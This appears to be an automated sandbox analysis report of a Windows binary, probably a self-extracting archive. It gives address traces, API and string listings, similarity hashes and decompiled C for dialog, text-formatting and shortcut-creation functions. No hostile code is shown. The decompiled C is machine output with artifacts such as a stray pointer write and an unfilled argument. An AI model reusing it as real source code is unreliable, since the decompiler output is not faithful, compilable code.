0x0040e77a
0x0040e781
0x00000000
0x0040e781
0x0040e722
0x0040e728
0x0040e72b
0x00000000
0x00000000
0x00000000
0x0040e801
0x0040e801
0x0040e810
0x0040e815
0x0040e815
0x00000000
0x0040e6c9
0x00000000
0x0040e831
0x0040e835
0x0040e859
0x0040e85d
0x0040e867
0x0040e86f
0x0040e85f
0x0040e85f
0x0040e85f
0x0040e871
0x0040e875
0x0040e887
0x0040e877
0x0040e877
0x0040e877
0x0040e88a
0x0040e88f
0x0040e895
0x0040e896
0x0040e89c
0x0040e8a1
0x0040e8a4
0x0040e8a8
0x0040e8ad
0x0040e8af
0x0040e8af
0x0040e8b1
0x0040e8b1
0x0040e8b6
0x0040e8bb
0x0040e8bf
0x0040e8c0
0x0040e8c1
0x0040e8c7
0x0040e8c8
0x0040e8cd
0x0040e8cd
0x0040e8c1
0x00000000
0x00000000
0x0040e8d3
0x0040e8d7
0x0040e8e7
0x0040e8e7
0x00000000
0x00000000
0x0040e8f2
0x0040e8f6
0x00000000
0x00000000
0x0040e8fc
0x0040e904
0x00000000
0x00000000
0x0040e90a
0x0040e90c
0x0040e914
0x0040e91a
0x0040e91d
0x0040e924
0x0040e926
0x0040e92c
0x0040e92c
0x0040e930
0x0040e936
0x0040e938
0x00000000
0x0040e93e
0x0040e93e
0x0040e941
0x0040e945
0x0040e961
0x0040e961
0x0040e965
0x0040ea46
0x0040ea46
0x0040ea47
0x0040ea47
0x0040ea4d
0x0040ea4e
0x0040ea53
0x0040ea53
0x0040ea54
0x0040ea55
0x0040ea55
0x0040ea5e
0x0040ea63
0x0040ea64
0x0040ea65
0x0040ea67
0x0040ea69
0x0040ea6e
0x0040ea70
0x0040ea70
0x0040ea72
0x0040ea72
0x0040ea6e
0x0040ea7d
0x0040ea82
0x0040ea83
0x0040ea8c
0x0040ea9c
0x0040eaa6
0x0040eab5
0x0040eabb
0x0040eac3
0x0040eac8
0x0040eac9
0x0040eaca
0x0040eacc
0x0040eae1
0x0040eae1
0x00000000
0x0040eacc
0x0040e96b
0x0040e96e
0x0040e97b
0x0040e97b
0x0040e98d
0x0040e993
0x0040e995
0x0040e99b
0x0040e9a2
0x0040e9b0
0x0040e9c0
0x0040e9c6
0x0040e9c9
0x0040e9ce
0x0040e9d1
0x0040e9d3
0x0040e9d3
0x0040e9d6
0x0040e9d6
0x0040e9d8
0x0040e9d8
0x0040e9e0
0x0040e9e8
0x0040e9ea
0x0040e9f1
0x0040e9f6
0x0040ea00
0x0040ea0e
0x0040ea13
0x0040ea14
0x0040ea14
0x0040ea00
0x0040ea1b
0x0040ea1d
0x0040ea29
0x0040ea2d
0x0040ea33
0x00000000
0x0040ea35
0x0040ea3f
0x00000000
0x0040ea3f
0x0040ea33
0x0040e970
0x0040e975
0x00000000
0x00000000
0x00000000
0x0040e975
0x0040e947
0x0040e94c
0x00000000
0x00000000
0x0040e94e
0x0040e94e
0x0040e951
0x0040e955
0x00000000
0x0040e95b
0x0040e95b
0x00000000
0x0040e95b
0x0040e955
0x00000000
0x0040eaec
0x0040eaed
0x0040eaf2
0x0040eaf4
0x0040eaf6
0x0040eaf7
0x0040eaf7
0x00000000
0x0040eb2d
0x0040eb34
0x0040eb34
0x0040eb37
0x0040eb64
0x0040eb64
0x0040eb6b
0x00000000
0x0040eb6b
0x0040eb39
0x0040eb39
0x0040eb3c
0x0040eb51
0x0040eb58
0x0040eb58
0x00000000
0x0040eb58
0x0040eb3e
0x0040eb3e
0x0040eb3f
0x00000000
0x00000000
0x0040eb41
0x0040eb41
0x0040eb42
0x00000000
0x00000000
0x0040eb48
0x00000000
0x00000000
0x0040ebba
0x0040ebbe
0x00000000
0x00000000
0x0040ebc0
0x0040ebcc
0x0040ebd1
0x0040ebd2
0x0040ebd3
0x0040ebd5
0x00000000
0x00000000
0x0040ebd7
0x00000000
0x00000000
0x0040ebff
0x0040ec03
0x0040ed7a
0x0040ed7a
0x0040ed7e
0x0040ed84
0x0040ed8b
0x0040ed8d
0x0040ed8d
0x0040ed97
0x0040ed97
0x00000000
0x0040ed7e
0x0040ec11
0x0040ec1f
0x0040ec24
0x0040ec28
0x0040ec2a
0x0040ec37
0x0040ec37
0x0040ec45
0x0040ec55
0x0040ec5b
0x0040ec5c
0x0040ec5e
0x0040ec61
0x00000000
0x00000000
0x0040ec31
0x0040ec31
0x0040ec31
0x0040ec34
0x0040ec34
0x0040ec6f
0x0040ec75
0x0040ec7d
0x00000000
0x00000000
0x0040ec83
0x0040ec8a
0x00000000
0x00000000
0x0040ec90
0x0040ec92
0x0040ec99
0x0040eca2
0x0040eca7
0x0040eca8
0x0040eca9
0x0040ecab
0x0040ecf7
0x0040ecf7
0x0040ecff
0x0040ed08
0x0040ed14
0x0040ed22
0x0040ed27
0x0040ed31
0x0040ed36
0x0040ed38
0x0040ed48
0x0040ed52
0x0040ed58
0x0040ed5b
0x00000000
0x0040ed61
0x0040ed66
0x0040ed6d
0x0040ed74
0x00000000
0x0040ed74
0x0040ed5b
0x0040ecad
0x0040ecaf
0x0040ecb6
0x00000000
0x00000000
0x0040ecb8
0x0040ecbe
0x0040ecbe
0x0040ecc2
0x00000000
0x00000000
0x0040ecc4
0x0040ecc5
0x0040eccc
0x0040ecd0
0x00000000
0x00000000
0x00000000
0x0040ecd2
0x0040ecd4
0x0040ecdf
0x0040ece6
0x0040eceb
0x0040ecec
0x0040ecec
0x0040ecee
0x0040ecef
0x00000000
0x00000000
0x0040eda3
0x0040eda7
0x0040eda9
0x0040edb1
0x0040edbd
0x0040edbd
0x0040edc3
0x0040edcb
0x0040edcb
0x0040edd0
0x00000000
0x00000000
0x0040eddc
0x0040ede0
0x0040ebe7
0x0040ebe7
0x00000000
0x0040ebe7
0x0040ede6
0x0040ebd9
0x0040ebd9
0x0040ebdc
0x0040ebe2
0x00000000
0x00000000
0x00000000
0x00000000
0x0040f123
0x0040f127
0x0040f129
0x0040f129
0x00000000
0x00000000
0x0040eb77
0x0040eb7f
0x0040eb85
0x0040eb88
0x0040ebae
0x0040eb8a
0x0040eb8a
0x0040eb8d
0x0040eba2
0x0040eb8f
0x0040eb8f
0x0040eb96
0x0040eb96
0x0040eb8d
0x00000000
0x00000000
0x0040ebf3
0x0040ebf4
0x0040ebf9
0x0040ebfb
0x0040ebfb
0x00000000
0x00000000
0x0040e5f5
0x0040e5f9
0x0040e5fe
0x0040e605
0x0040e605
0x0040e608
0x00000000
0x0040e60a
0x0040e60a
0x00000000
0x0040e60a
0x0040e608
0x0040f162
0x0040f16a
0x0040f16a
0x00000000
0x0040f059
0x0040f04a
0x0040ee8c
0x0040edf1

APIs

_wcscpy.LIBCMT ref: 0040EE7D
_wcscpy.LIBCMT ref: 0040EE9C
_wcschr.LIBCMT ref: 0040EEAA
_wcscpy.LIBCMT ref: 0040EECA
_wcscpy.LIBCMT ref: 0040EF54
_wcscpy.LIBCMT ref: 0040F00C
_wcscpy.LIBCMT ref: 0040F089

Part of subcall function 0041078F: _wcsncpy.LIBCMT ref: 004107A6

SHChangeNotify.SHELL32(00001000,00000005,00000000,00000000), ref: 0040F11B

Strings

", xrefs: 0040EE82
.lnk, xrefs: 0040F04C, 0040F05C

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: _wcscpy$ChangeNotify_wcschr_wcsncpy
String ID: "$.lnk
API String ID: 1911921660-4024015082
Opcode ID: 318172c01959d5ea4b5a7df334a27f2f97196a07b8485471a82622d560e8cb5e
Instruction ID: df737c0b2c6cbaf7816b4d14c80a573dff5179e5009509e09df1df61e55c6008
Opcode Fuzzy Hash: 318172c01959d5ea4b5a7df334a27f2f97196a07b8485471a82622d560e8cb5e
Instruction Fuzzy Hash: 1391367290022D9ADF35EB51CC45EEE73BCBB08704F0445ABE109F3191EB789AE48B59

Uniqueness

Uniqueness Score: -1.00%

Function 0040EBF4, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 131windowCOMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(?,?), ref: 0040EC11

Part of subcall function 00409DEB: _wcslen.LIBCMT ref: 00409DF1
Part of subcall function 00409DEB: _wcscat.LIBCMT ref: 00409E10

_swprintf.LIBCMT ref: 0040EC4D

Part of subcall function 0040D452: __vswprintf_c_l.LIBCMT ref: 0040D465

SetDlgItemTextW.USER32 ref: 0040EC6F
_wcschr.LIBCMT ref: 0040ECA2
_wcscpy.LIBCMT ref: 0040ECE6
_wcscpy.LIBCMT ref: 0040ED0F
_wcscpy.LIBCMT ref: 0040ED22
MessageBoxW.USER32(?,00000000,00000000,00000024), ref: 0040ED52
EndDialog.USER32(?,00000001), ref: 0040ED74

Strings

%s%s%d, xrefs: 0040EC2A, 0040EC44

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: _wcscpy$DialogItemMessagePathTempText__vswprintf_c_l_swprintf_wcscat_wcschr_wcslen
String ID: %s%s%d
API String ID: 1897388972-1000756122
Opcode ID: 3870f111cc543a9ba69e42a6537688cdcb3cd3166008da15a35897c62ce42422
Instruction ID: 300253967b2ec258546cf83a37201b34777ea0dfe61a493b42d2d2167c2a1687
Opcode Fuzzy Hash: 3870f111cc543a9ba69e42a6537688cdcb3cd3166008da15a35897c62ce42422
Instruction Fuzzy Hash: C451637280011DDBDB21DFA0DC44BEE77B8BB04308F4444BBE709E7191E7799AA98B59

Uniqueness

Uniqueness Score: -1.00%

Function 00418DC8, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00418DC8(void* __ebx, void* __eflags, short* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __edi;
				void* __esi;
				void* __ebp;
				short* _t32;
				signed int _t33;
				signed int _t41;
				void* _t51;
				void* _t52;
				short* _t53;
				short* _t55;
				short* _t57;

				_push(_t43);
				_t57 = _a4;
				_push(_t52);
				_t53 = E0041C86E(__ebx, _t51, _t52, 0x200 + E0041A0A7(_t57) * 0xc);
				_v12 = _t53;
				if(_t53 != 0) {
					_push(__ebx);
					E0041A0EF(_t53, L"<style>body{font-family:\"Arial\";font-size:12;}</style>");
					_t41 = E0041A0A7(_t53);
					__eflags =  *_t57;
					while(__eflags != 0) {
						_t33 = E004119C7(__eflags, _t57, L"\r\n\r\n", 4);
						__eflags = _t33;
						if(_t33 != 0) {
							__eflags = _t57 - _a4;
							if(_t57 <= _a4) {
								L13:
								 *((short*)(_t53 + _t41 * 2)) =  *_t57;
								_t41 = _t41 + 1;
								__eflags = _t41;
							} else {
								__eflags =  *_t57 - 0x20;
								if( *_t57 != 0x20) {
									goto L13;
								} else {
									__eflags =  *((short*)(_t57 - 2)) - 0x20;
									if( *((short*)(_t57 - 2)) != 0x20) {
										goto L13;
									} else {
										E0041A0EF(_t53 + _t41 * 2, L"&nbsp;");
										_t41 = _t41 + 6;
									}
								}
							}
						} else {
							_t55 = _t57 + 4;
							__eflags =  *_t55 - 0xd;
							if( *_t55 == 0xd) {
								_v8 = _v12 + _t41 * 2;
								while(1) {
									__eflags =  *((short*)(_t57 + 6)) - 0xa;
									if( *((short*)(_t57 + 6)) != 0xa) {
										goto L8;
									}
									E0041A0EF(_v8, L"<br>");
									_v8 = _v8 + 8;
									_t57 = _t55;
									_t55 = _t57 + 4;
									_t41 = _t41 + 4;
									__eflags =  *_t55 - 0xd;
									if( *_t55 == 0xd) {
										continue;
									}
									goto L8;
								}
							}
							L8:
							_t53 = _v12;
							_t57 = _t57 + 2;
						}
						_t57 = _t57 + 2;
						__eflags =  *_t57;
					}
					_push(_a4);
					__eflags = 0;
					 *((short*)(_t53 + _t41 * 2)) = 0;
					E00419DFE(_t41, _t53, _t57, 0);
					_t32 = _t53;
				} else {
					_t32 = _t57;
				}
				return _t32;
			}

0x00418dcc
0x00418dce
0x00418dd1
0x00418de6
0x00418dea
0x00418def
0x00418df8
0x00418dff
0x00418e0a
0x00418e11
0x00418e15
0x00418e23
0x00418e28
0x00418e2a
0x00418e6d
0x00418e70
0x00418e94
0x00418e97
0x00418e9b
0x00418e9b
0x00418e72
0x00418e72
0x00418e76
0x00000000
0x00418e78
0x00418e78
0x00418e7d
0x00000000
0x00418e7f
0x00418e88
0x00418e8f
0x00418e8f
0x00418e7d
0x00418e76
0x00418e2c
0x00418e2c
0x00418e2f
0x00418e33
0x00418e3b
0x00418e3e
0x00418e3e
0x00418e43
0x00000000
0x00000000
0x00418e4d
0x00418e52
0x00418e56
0x00418e58
0x00418e5c
0x00418e5f
0x00418e64
0x00000000
0x00000000
0x00000000
0x00418e64
0x00418e3e
0x00418e66
0x00418e66
0x00418e6a
0x00418e6a
0x00418e9d
0x00418e9e
0x00418e9e
0x00418ea8
0x00418eab
0x00418ead
0x00418eb1
0x00418eb7
0x00418df1
0x00418df1
0x00418df1
0x00418ebd

APIs

_wcslen.LIBCMT ref: 00418DD3
_malloc.LIBCMT ref: 00418DE1

Part of subcall function 0041C86E: __FF_MSGBANNER.LIBCMT ref: 0041C891
Part of subcall function 0041C86E: __NMSG_WRITE.LIBCMT ref: 0041C898
Part of subcall function 0041C86E: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,004208E4,00000000,00000001,00000000,?,0041E92D,00000018,0042D8F0,0000000C,0041E9BE), ref: 0041C8E5

_wcscpy.LIBCMT ref: 00418DFF
_wcslen.LIBCMT ref: 00418E05
_wcscpy.LIBCMT ref: 00418E4D

Strings

<br>, xrefs: 00418E45
 , xrefs: 00418E82
<style>body{font-family:"Arial";font-size:12;}</style>, xrefs: 00418DF9
, xrefs: 00418E1D

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: _wcscpy_wcslen$AllocateHeap_malloc
String ID: $ $<br>$<style>body{font-family:"Arial";font-size:12;}</style>
API String ID: 2405444336-406990186
Opcode ID: 89398f93dbb8edec5c781462d7229d76c16f0091c4b2df1cf8ba0ad9f60a4b0b
Instruction ID: 4cc432baec6cf21451fdc736c02529d02e6235769d11cebe88a09c5b4374dc82
Opcode Fuzzy Hash: 89398f93dbb8edec5c781462d7229d76c16f0091c4b2df1cf8ba0ad9f60a4b0b
Instruction Fuzzy Hash: 2021D572D40314ABCB20AF18DC41ADE77A4EF44714B60401FE441E7291EBBC6DE1839D

Uniqueness

Uniqueness Score: -1.00%

Function 0040F1A6, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 96
windowCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0040F1A6(void* __ecx, void* __edx, void* __esi, void* __eflags, void* __fp0, struct HWND__* _a4, struct HWND__* _a8, signed short _a12, intOrPtr _a16) {
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t16;
				long _t17;
				long _t18;
				struct HWND__* _t20;
				void* _t34;
				struct HWND__* _t36;
				void* _t37;
				void* _t38;
				void* _t43;
				void* _t44;
				void* _t52;

				_t52 = __fp0;
				_t40 = __edx;
				_t37 = __ecx;
				_t36 = _a4;
				if (E00406056(__edx, _t36, _a8, _a12, _a16, L"LICENSEDLG", 0, 0) != 0) goto L16;
				 *((intOrPtr*)(_t36 + 0x102d0c45)) =  *((intOrPtr*)(_t36 + 0x102d0c45)) + _t37;
				_t16 = _a8 - 0x110;
				if(_t16 == 0) {
					_t17 =  *0x438cd4;
					_t43 = SendMessageW;
					__eflags = _t17;
					if(_t17 != 0) {
						SendMessageW(_t36, 0x80, 1, _t17);
					}
					_t18 =  *0x438cd0;
					__eflags = _t18;
					if(__eflags != 0) {
						SendDlgItemMessageW(_t36, 0x66, 0x172, 0, _t18);
					}
					E0040D8AE(_t40, __eflags, _t52, _t36);
					_t20 = GetDlgItem(_t36, 0x65);
					_a8 = _t20;
					SendMessageW(_t20, 0x435, 0, 0x10000);
					SendMessageW(_a8, 0x443, 0, GetSysColor(0xf));
					E0040E582(_t43, _t36,  *0x440d00, 3);
					_pop(_t44);
					__eflags =  *0x440d08;
					if(__eflags == 0) {
						goto L14;
					}
					SetForegroundWindow(_t36);
					_t38 =  *0x437cc8; // 0x0
					E00419542(_t38, __eflags,  *0x432a64, _a8,  *0x440d08, 0, 0);
					_push( *0x440d08);
					E00419DFE(_t36, 0, _t44, __eflags);
					goto L16;
				} else {
					if(_t16 != 1) {
						L6:
						return 0;
					}
					_t34 = (_a12 & 0x0000ffff) - 1;
					if(_t34 == 0) {
						L14:
						_push(1);
						L15:
						EndDialog(_t36, ??);
						L16:
						__eflags = 1;
						return 1;
					}
					if(_t34 == 1) {
						_push(0);
						goto L15;
					}
					goto L6;
				}
			}

0x0040f1a6
0x0040f1a6
0x0040f1a6
0x0040f1aa
0x0040f1c8
0x0040f1cd
0x0040f1d1
0x0040f1d6
0x0040f1f6
0x0040f1fc
0x0040f202
0x0040f204
0x0040f20f
0x0040f20f
0x0040f211
0x0040f216
0x0040f218
0x0040f224
0x0040f224
0x0040f22b
0x0040f233
0x0040f245
0x0040f248
0x0040f25c
0x0040f267
0x0040f26c
0x0040f26d
0x0040f273
0x00000000
0x00000000
0x0040f276
0x0040f27c
0x0040f293
0x0040f298
0x0040f29e
0x00000000
0x0040f1d8
0x0040f1d9
0x0040f1e9
0x00000000
0x0040f1e9
0x0040f1df
0x0040f1e0
0x0040f2a6
0x0040f2a6
0x0040f2a8
0x0040f2a9
0x0040f2af
0x0040f2b1
0x00000000
0x0040f2b1
0x0040f1e7
0x0040f1f0
0x00000000
0x0040f1f0
0x00000000
0x0040f1e7

APIs

SendMessageW.USER32(?,00000080,00000001,?), ref: 0040F20F
SendDlgItemMessageW.USER32 ref: 0040F224
GetDlgItem.USER32 ref: 0040F233
SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0040F248
GetSysColor.USER32(0000000F), ref: 0040F24C
SendMessageW.USER32(?,00000443,00000000,00000000), ref: 0040F25C
SetForegroundWindow.USER32(?,00000003), ref: 0040F276
EndDialog.USER32(?,00000001), ref: 0040F2A9

Strings

LICENSEDLG, xrefs: 0040F1B2

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Item$ColorDialogForegroundWindow
String ID: LICENSEDLG
API String ID: 3794146707-2177901306
Opcode ID: c745a93a0de874f307b4772ac89cc692836675c87f4653bb7882ea50edd278dc
Instruction ID: 787432fd815d6e591c4838d79146998a9d4efafa3007e884a906c9801103195f
Opcode Fuzzy Hash: c745a93a0de874f307b4772ac89cc692836675c87f4653bb7882ea50edd278dc
Instruction Fuzzy Hash: F621D675200204BBDB316FA5EC45EAB3B2EEB85B00F40443AFA05B51E1C67E8965D738

Uniqueness

Uniqueness Score: -1.00%

Function 0040D8AE, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 82
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040D8AE(void* __edx, void* __eflags, void* __fp0, signed int _a4) {
				struct HWND__* _v8;
				intOrPtr _v24;
				intOrPtr _v28;
				void _v32;
				short _v4128;
				void* _t16;
				struct HWND__* _t17;
				void* _t27;
				struct HWND__* _t37;
				void* _t41;
				void* _t42;
				void* _t52;

				_t52 = __fp0;
				_t42 = __eflags;
				E0041A3E0(0x101c);
				_t16 = E0040CF9E(_t42);
				if(_t16 == 0) {
					return _t16;
				}
				_t17 = GetWindow(_a4, 5);
				_a4 = _a4 & 0x00000000;
				_t37 = _t17;
				_v8 = _t37;
				if(_t37 == 0) {
					L12:
					return _t17;
				} else {
					while(_a4 < 0x200) {
						GetClassNameW(_t37,  &_v4128, 0x800);
						if(E004119A6( &_v4128, L"STATIC") == 0 && (GetWindowLongW(_t37, 0xfffffff0) & 0x0000001f) == 0xe) {
							_t41 = SendMessageW(_t37, 0x173, 0, 0);
							if(_t41 != 0) {
								GetObjectW(_t41, 0x18,  &_v32);
								_t27 = E0040CF5B(_v24);
								SendMessageW(_t37, 0x172, 0, E004197B0(_t52, _t41, E0040CF18(_v28), _t27));
								if(_t41 !=  *0x438cd0) {
									DeleteObject(_t41);
								}
							}
						}
						_t17 = GetWindow(_t37, 2);
						_t37 = _t17;
						if(_t37 != _v8) {
							_a4 =  &(_a4->i);
							if(_t37 != 0) {
								continue;
							}
						}
						break;
					}
					goto L12;
				}
			}

0x0040d8ae
0x0040d8ae
0x0040d8b6
0x0040d8bb
0x0040d8c2
0x0040d9a2
0x0040d9a2
0x0040d8ce
0x0040d8d4
0x0040d8d8
0x0040d8da
0x0040d8df
0x0040d9a0
0x00000000
0x0040d8e5
0x0040d8ed
0x0040d907
0x0040d920
0x0040d93e
0x0040d942
0x0040d94b
0x0040d954
0x0040d972
0x0040d97a
0x0040d97d
0x0040d97d
0x0040d97a
0x0040d942
0x0040d986
0x0040d98c
0x0040d991
0x0040d993
0x0040d998
0x00000000
0x00000000
0x0040d998
0x00000000
0x0040d991
0x00000000
0x0040d99f

APIs

GetWindow.USER32(?,00000005), ref: 0040D8CE
GetClassNameW.USER32 ref: 0040D907

Part of subcall function 004119A6: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,00000000,000000FF,004099A9,?,00000000,?,00409AC3,00000000,-00000002,?,00000000,?), ref: 004119BC

GetWindowLongW.USER32(00000000,000000F0), ref: 0040D925
SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0040D93C
GetObjectW.GDI32(00000000,00000018,?), ref: 0040D94B

Part of subcall function 0040CF5B: GetDC.USER32(00000000), ref: 0040CF67
Part of subcall function 0040CF5B: GetDeviceCaps.GDI32(00000000,0000005A), ref: 0040CF76
Part of subcall function 0040CF5B: ReleaseDC.USER32 ref: 0040CF84

Part of subcall function 0040CF18: GetDC.USER32(00000000), ref: 0040CF24
Part of subcall function 0040CF18: GetDeviceCaps.GDI32(00000000,00000058), ref: 0040CF33
Part of subcall function 0040CF18: ReleaseDC.USER32 ref: 0040CF41

Part of subcall function 004197B0: GetObjectW.GDI32(00000200,00000018,?,00000000,00000000,745DBB20), ref: 004197C2
Part of subcall function 004197B0: CoCreateInstance.OLE32(0042B168,00000000,00000001,0042B060,?,?), ref: 004197F1

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040D972
DeleteObject.GDI32(00000000), ref: 0040D97D
GetWindow.USER32(00000000,00000002), ref: 0040D986

Strings

STATIC, xrefs: 0040D90D

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: ObjectWindow$CapsDeviceMessageReleaseSend$ClassCompareCreateDeleteInstanceLongNameString
String ID: STATIC
API String ID: 2902258137-1882779555
Opcode ID: 0b58a8141154be27fea9f5a836f2f1d2d35a7568d8d373671dd557c9060d344a
Instruction ID: adce3e25fefb258b91b095fe7e4e4a97cdc8f3c93a1a7f2703c1680ae8c76e07
Opcode Fuzzy Hash: 0b58a8141154be27fea9f5a836f2f1d2d35a7568d8d373671dd557c9060d344a
Instruction Fuzzy Hash: 7A21DA72640204BBDB21AF94DC46FAFB778AB40B44F504036FE04B61D1CB7C99469AAE

Uniqueness

Uniqueness Score: -1.00%

Function 0040BBC2, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 129
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E0040BBC2(intOrPtr* __ecx, intOrPtr _a4, short* _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20) {
				char _v24;
				char _v25;
				char _v4120;
				char _v8216;
				short* _t25;
				intOrPtr _t28;
				void* _t40;
				void* _t41;
				signed int _t42;
				void* _t52;
				void* _t55;
				intOrPtr* _t57;
				void* _t58;
				char* _t62;
				signed int _t67;
				void* _t71;
				intOrPtr _t72;
				signed int _t74;

				E0041A3E0(0x2014);
				_t57 = __ecx;
				if( *__ecx == 0) {
					L19:
					_t25 = _a8;
					if(_a4 == _t25) {
						L21:
						return _t25;
					}
					return E0041A0EF(_t25, _a4);
				}
				_t28 = _a16;
				_t62 = 0x42a706;
				if(_t28 == 0) {
					_t62 = "s";
				} else {
					_t55 = _t28 - 1;
					if(_t55 == 0) {
						_t62 = "$";
					} else {
						if(_t55 == 1) {
							_t62 = "@";
						}
					}
				}
				_t71 = E00405595(0xffffffff, _t62, 1);
				if(_a20 != 0) {
					E00411643(_t62, _a20,  &_v8216, 0x1000);
					_t52 = E0041A350( &_v8216);
					_pop(_t62);
					_t71 = E00405595(_t71,  &_v8216, _t52);
				}
				E00411643(_t62, _a4,  &_v4120, 0x1000);
				_v25 = 0;
				E0040D452( &_v24, 0xa, L"%08x",  !(E00405595(_t71,  &_v4120, E0041A350( &_v4120))));
				_t40 = E0040B84A(_t57,  &_v24);
				if(_t40 == 0) {
					goto L19;
				} else {
					_t14 = _t40 + 0x14; // 0x14
					_t58 = _t14;
					_t41 = E0041C359(_t58, 0xc);
					if(_t41 == 0) {
						_t74 = 0xff;
					} else {
						_t74 = _t41 - _t58 >> 1;
					}
					_t42 = _a12;
					_t16 = _t42 - 1; // 0x411449
					_t67 = _t16;
					if(_t74 > _t67) {
						asm("sbb eax, eax");
						_t74 =  ~_t42 & _t67;
					}
					_t72 = _a8;
					if(_t74 > 0) {
						E0041C2C1(_t72, _t58, _t74);
					}
					 *((short*)(_t72 + _t74 * 2)) = 0;
					_t25 = E0041C37F(_t72, 0x22);
					if(_t25 == 0) {
						goto L21;
					} else {
						 *_t25 = 0;
						return _t25;
					}
				}
			}

0x0040bbca
0x0040bbd0
0x0040bbd7
0x0040bcf8
0x0040bcf8
0x0040bcfe
0x0040bd0f
0x0040bd0f
0x0040bd0f
0x00000000
0x0040bd0a
0x0040bbe0
0x0040bbe3
0x0040bbe8
0x0040bbfe
0x0040bbea
0x0040bbea
0x0040bbeb
0x0040bbf7
0x0040bbed
0x0040bbee
0x0040bbf0
0x0040bbf0
0x0040bbee
0x0040bbeb
0x0040bc11
0x0040bc18
0x0040bc25
0x0040bc31
0x0040bc36
0x0040bc45
0x0040bc45
0x0040bc52
0x0040bc5e
0x0040bc84
0x0040bc92
0x0040bc99
0x00000000
0x0040bc9b
0x0040bc9b
0x0040bc9b
0x0040bca1
0x0040bcaa
0x0040bcb4
0x0040bcac
0x0040bcb0
0x0040bcb0
0x0040bcb9
0x0040bcbc
0x0040bcbc
0x0040bcc1
0x0040bcc5
0x0040bcc9
0x0040bcc9
0x0040bccb
0x0040bcd0
0x0040bcd5
0x0040bcda
0x0040bce2
0x0040bce6
0x0040bcef
0x00000000
0x0040bcf1
0x0040bcf3
0x00000000
0x0040bcf3
0x0040bcef

APIs

_strlen.LIBCMT ref: 0040BC31
_strlen.LIBCMT ref: 0040BC62
_swprintf.LIBCMT ref: 0040BC84
_wcschr.LIBCMT ref: 0040BCA1
_wcsncpy.LIBCMT ref: 0040BCD5
_wcsrchr.LIBCMT ref: 0040BCE6
_wcscpy.LIBCMT ref: 0040BD04

Strings

%08x, xrefs: 0040BC79

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: _strlen$_swprintf_wcschr_wcscpy_wcsncpy_wcsrchr
String ID: %08x
API String ID: 3224783807-3682738293
Opcode ID: 718c724857e7c6dfd136cbb566ce27b7f592dcfc7f4a1650c798727364308f29
